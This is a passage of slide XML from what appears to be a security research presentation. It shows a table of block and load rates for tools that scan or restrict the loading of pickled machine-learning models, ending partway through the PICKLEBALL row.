            <a:ext cx="426490" cy="410036"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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64" name="Shape 1064"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1065" name="Google Shape;1065;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Evaluation: P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Creates Secure and Usable Policies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1066" name="Google Shape;1066;p84"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1067" name="Google Shape;1067;p84"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="1618725"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{11C30A3B-6D4B-4216-B4AD-653BF54A5768}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1441700"/>
                <a:gridCol w="1157000"/>
                <a:gridCol w="1113625"/>
                <a:gridCol w="1194125"/>
                <a:gridCol w="1181750"/>
                <a:gridCol w="1150800"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Tool</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Type</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Malicious Blocked</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Correct Block Rate</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Benign Loaded</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Correct Load Rate</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>ProtectAI ModelScan</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Scanner</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>75/84</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>89.3%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>236/252</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>93.6%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="550975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>ModelTracer</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Scanner</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>44/84</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>52.4%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>252/252</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Weights-Only Unpickler</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Restricted Loader</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>84/84</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>157/252</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>62.3%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>P</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>ICKLE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>B</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>ALL</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Restricted Loader</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
